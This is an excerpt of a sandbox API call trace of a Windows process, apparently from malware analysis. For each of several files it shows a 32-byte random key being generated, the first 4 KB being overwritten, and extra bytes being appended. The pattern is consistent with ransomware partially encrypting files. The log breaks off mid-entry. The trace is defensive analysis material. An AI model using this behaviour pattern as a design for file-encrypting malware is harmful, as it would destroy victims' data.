[0078.384] GetProcessHeap () returned 0x4f10000 [0078.384] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.384] GetProcessHeap () returned 0x4f10000 [0078.384] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.385] GetProcessHeap () returned 0x4f10000 [0078.385] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.385] GetProcessHeap () returned 0x4f10000 [0078.385] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.385] GetProcessHeap () returned 0x4f10000 [0078.385] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.385] GetProcessHeap () returned 0x4f10000 [0078.385] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.385] GetProcessHeap () returned 0x4f10000 [0078.385] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.385] GetProcessHeap () returned 0x4f10000 [0078.385] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.385] GetProcessHeap () returned 0x4f10000 [0078.385] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.385] GetProcessHeap () returned 0x4f10000 [0078.385] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.385] GetProcessHeap () returned 0x4f10000 [0078.385] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.385] GetProcessHeap () returned 0x4f10000 [0078.385] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.385] GetProcessHeap () returned 0x4f10000 [0078.385] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.385] GetProcessHeap () returned 0x4f10000 [0078.385] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.385] GetProcessHeap () returned 0x4f10000 [0078.385] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.385] GetProcessHeap () returned 0x4f10000 [0078.385] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.385] GetProcessHeap () returned 0x4f10000 [0078.386] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.386] GetProcessHeap () returned 0x4f10000 [0078.386] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0078.386] GetProcessHeap () returned 0x4f10000 [0078.386] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.386] GetProcessHeap () returned 0x4f10000 [0078.386] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0078.386] GetProcessHeap () returned 0x4f10000 [0078.386] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0078.386] GetProcessHeap () returned 0x4f10000 [0078.386] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0078.386] GetProcessHeap () returned 0x4f10000 [0078.386] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0078.386] SetFilePointerEx (in: hFile=0x7f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.386] WriteFile (in: hFile=0x7f0, lpBuffer=0x7d7f878*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f878*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0078.386] WriteFile (in: hFile=0x7f0, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0078.386] GetProcessHeap () returned 0x4f10000 [0078.386] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0078.386] GetProcessHeap () returned 0x4f10000 [0078.386] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0078.386] GetProcessHeap () returned 0x4f10000 [0078.386] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0078.386] CloseHandle (hObject=0x7f0) returned 1 [0078.387] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 30 [0078.388] SetFilePointerEx (in: hFile=0x7f4, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.388] ReadFile (in: hFile=0x7f4, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0078.388] SetFilePointerEx (in: hFile=0x7f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.388] GetProcessHeap () returned 0x4f10000 [0078.388] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0078.388] GetProcessHeap () returned 0x4f10000 [0078.388] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56528 [0078.388] SystemFunction036 (in: RandomBuffer=0x7d56528, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56528) returned 1 [0078.388] GetProcessHeap () returned 0x4f10000 [0078.388] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0078.388] ReadFile (in: hFile=0x7f4, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0078.437] SetFilePointerEx (in: hFile=0x7f4, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.437] WriteFile (in: hFile=0x7f4, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0078.437] GetProcessHeap () returned 0x4f10000 [0078.437] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0078.437] GetProcessHeap () returned 0x4f10000 [0078.437] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.437] GetProcessHeap () returned 0x4f10000 [0078.438] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0078.438] GetProcessHeap () returned 0x4f10000 [0078.438] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.438] GetProcessHeap () returned 0x4f10000 [0078.438] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0078.438] GetProcessHeap () returned 0x4f10000 [0078.438] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.438] GetProcessHeap () returned 0x4f10000 [0078.438] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.438] GetProcessHeap () returned 0x4f10000 [0078.438] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.438] GetProcessHeap () returned 0x4f10000 [0078.438] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.438] GetProcessHeap () returned 0x4f10000 [0078.438] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.438] GetProcessHeap () returned 0x4f10000 [0078.438] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.438] GetProcessHeap () returned 0x4f10000 [0078.438] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.438] GetProcessHeap () returned 0x4f10000 [0078.438] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.438] GetProcessHeap () returned 0x4f10000 [0078.438] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.438] GetProcessHeap () returned 0x4f10000 [0078.438] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.438] GetProcessHeap () returned 0x4f10000 [0078.438] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.438] GetProcessHeap () returned 0x4f10000 [0078.438] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.438] GetProcessHeap () returned 0x4f10000 [0078.438] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.438] GetProcessHeap () returned 0x4f10000 [0078.438] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.438] GetProcessHeap () returned 0x4f10000 [0078.438] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.438] GetProcessHeap () returned 0x4f10000 [0078.438] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.438] GetProcessHeap () returned 0x4f10000 [0078.439] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.439] GetProcessHeap () returned 0x4f10000 [0078.439] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.439] GetProcessHeap () returned 0x4f10000 [0078.439] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.439] GetProcessHeap () returned 0x4f10000 [0078.439] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.439] GetProcessHeap () returned 0x4f10000 [0078.439] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.439] GetProcessHeap () returned 0x4f10000 [0078.439] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.439] GetProcessHeap () returned 0x4f10000 [0078.439] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.439] GetProcessHeap () returned 0x4f10000 [0078.439] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.439] GetProcessHeap () returned 0x4f10000 [0078.439] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.439] GetProcessHeap () returned 0x4f10000 [0078.439] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.439] GetProcessHeap () returned 0x4f10000 [0078.439] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.439] GetProcessHeap () returned 0x4f10000 [0078.439] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.439] GetProcessHeap () returned 0x4f10000 [0078.439] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.439] GetProcessHeap () returned 0x4f10000 [0078.439] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.439] GetProcessHeap () returned 0x4f10000 [0078.439] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.439] GetProcessHeap () returned 0x4f10000 [0078.439] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.439] GetProcessHeap () returned 0x4f10000 [0078.439] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.439] GetProcessHeap () returned 0x4f10000 [0078.439] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0078.439] GetProcessHeap () returned 0x4f10000 [0078.439] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.439] GetProcessHeap () returned 0x4f10000 [0078.440] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0078.440] GetProcessHeap () returned 0x4f10000 [0078.440] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0078.440] GetProcessHeap () returned 0x4f10000 [0078.440] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0078.440] GetProcessHeap () returned 0x4f10000 [0078.440] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0078.440] GetProcessHeap () returned 0x4f10000 [0078.440] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0078.440] GetProcessHeap () returned 0x4f10000 [0078.440] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0078.440] GetProcessHeap () returned 0x4f10000 [0078.440] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.440] GetProcessHeap () returned 0x4f10000 [0078.440] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0078.440] GetProcessHeap () returned 0x4f10000 [0078.440] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.440] GetProcessHeap () returned 0x4f10000 [0078.440] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.440] GetProcessHeap () returned 0x4f10000 [0078.440] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.440] GetProcessHeap () returned 0x4f10000 [0078.440] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.440] GetProcessHeap () returned 0x4f10000 [0078.440] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.440] GetProcessHeap () returned 0x4f10000 [0078.440] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.440] GetProcessHeap () returned 0x4f10000 [0078.440] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.440] GetProcessHeap () returned 0x4f10000 [0078.440] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.441] GetProcessHeap () returned 0x4f10000 [0078.441] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.441] GetProcessHeap () returned 0x4f10000 [0078.441] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.441] GetProcessHeap () returned 0x4f10000 [0078.441] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.441] GetProcessHeap () returned 0x4f10000 [0078.441] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.441] GetProcessHeap () returned 0x4f10000 [0078.441] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.441] GetProcessHeap () returned 0x4f10000 [0078.441] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.441] GetProcessHeap () returned 0x4f10000 [0078.441] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.441] GetProcessHeap () returned 0x4f10000 [0078.441] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.441] GetProcessHeap () returned 0x4f10000 [0078.441] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.441] GetProcessHeap () returned 0x4f10000 [0078.441] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.441] GetProcessHeap () returned 0x4f10000 [0078.441] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.441] GetProcessHeap () returned 0x4f10000 [0078.441] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.445] GetProcessHeap () returned 0x4f10000 [0078.445] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.445] GetProcessHeap () returned 0x4f10000 [0078.445] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.445] GetProcessHeap () returned 0x4f10000 [0078.445] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.445] GetProcessHeap () returned 0x4f10000 [0078.446] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.446] GetProcessHeap () returned 0x4f10000 [0078.446] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0078.446] GetProcessHeap () returned 0x4f10000 [0078.446] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.446] GetProcessHeap () returned 0x4f10000 [0078.446] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0078.446] GetProcessHeap () returned 0x4f10000 [0078.446] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0078.446] GetProcessHeap () returned 0x4f10000 [0078.446] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0078.446] GetProcessHeap () returned 0x4f10000 [0078.446] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0078.446] SetFilePointerEx (in: hFile=0x7f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.446] WriteFile (in: hFile=0x7f4, lpBuffer=0x7d7f878*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f878*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0078.446] WriteFile (in: hFile=0x7f4, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0078.446] GetProcessHeap () returned 0x4f10000 [0078.446] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0078.446] GetProcessHeap () returned 0x4f10000 [0078.446] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0078.446] GetProcessHeap () returned 0x4f10000 [0078.446] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0078.446] CloseHandle (hObject=0x7f4) returned 1 [0078.448] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 31 [0078.448] SetFilePointerEx (in: hFile=0x7f8, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.448] ReadFile (in: hFile=0x7f8, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0078.448] SetFilePointerEx (in: hFile=0x7f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.448] GetProcessHeap () returned 0x4f10000 [0078.448] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0078.448] GetProcessHeap () returned 0x4f10000 [0078.448] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56528 [0078.448] SystemFunction036 (in: RandomBuffer=0x7d56528, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56528) returned 1 [0078.448] GetProcessHeap () returned 0x4f10000 [0078.448] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0078.448] ReadFile (in: hFile=0x7f8, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0078.513] SetFilePointerEx (in: hFile=0x7f8, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.513] WriteFile (in: hFile=0x7f8, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0078.513] GetProcessHeap () returned 0x4f10000 [0078.513] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0078.513] GetProcessHeap () returned 0x4f10000 [0078.513] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.513] GetProcessHeap () returned 0x4f10000 [0078.513] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0078.513] GetProcessHeap () returned 0x4f10000 [0078.513] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.513] GetProcessHeap () returned 0x4f10000 [0078.513] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0078.513] GetProcessHeap () returned 0x4f10000 [0078.513] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.513] GetProcessHeap () returned 0x4f10000 [0078.513] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.514] GetProcessHeap () returned 0x4f10000 [0078.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.514] GetProcessHeap () returned 0x4f10000 [0078.514] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.514] GetProcessHeap () returned 0x4f10000 [0078.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.514] GetProcessHeap () returned 0x4f10000 [0078.514] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.514] GetProcessHeap () returned 0x4f10000 [0078.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.514] GetProcessHeap () returned 0x4f10000 [0078.514] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.514] GetProcessHeap () returned 0x4f10000 [0078.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.514] GetProcessHeap () returned 0x4f10000 [0078.514] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.514] GetProcessHeap () returned 0x4f10000 [0078.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.514] GetProcessHeap () returned 0x4f10000 [0078.514] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.514] GetProcessHeap () returned 0x4f10000 [0078.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.514] GetProcessHeap () returned 0x4f10000 [0078.514] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.514] GetProcessHeap () returned 0x4f10000 [0078.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.514] GetProcessHeap () returned 0x4f10000 [0078.514] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.514] GetProcessHeap () returned 0x4f10000 [0078.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.514] GetProcessHeap () returned 0x4f10000 [0078.514] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.514] GetProcessHeap () returned 0x4f10000 [0078.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.514] GetProcessHeap () returned 0x4f10000 [0078.514] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.514] GetProcessHeap () returned 0x4f10000 [0078.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.514] GetProcessHeap () returned 0x4f10000 [0078.515] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.515] GetProcessHeap () returned 0x4f10000 [0078.515] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.515] GetProcessHeap () returned 0x4f10000 [0078.515] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) 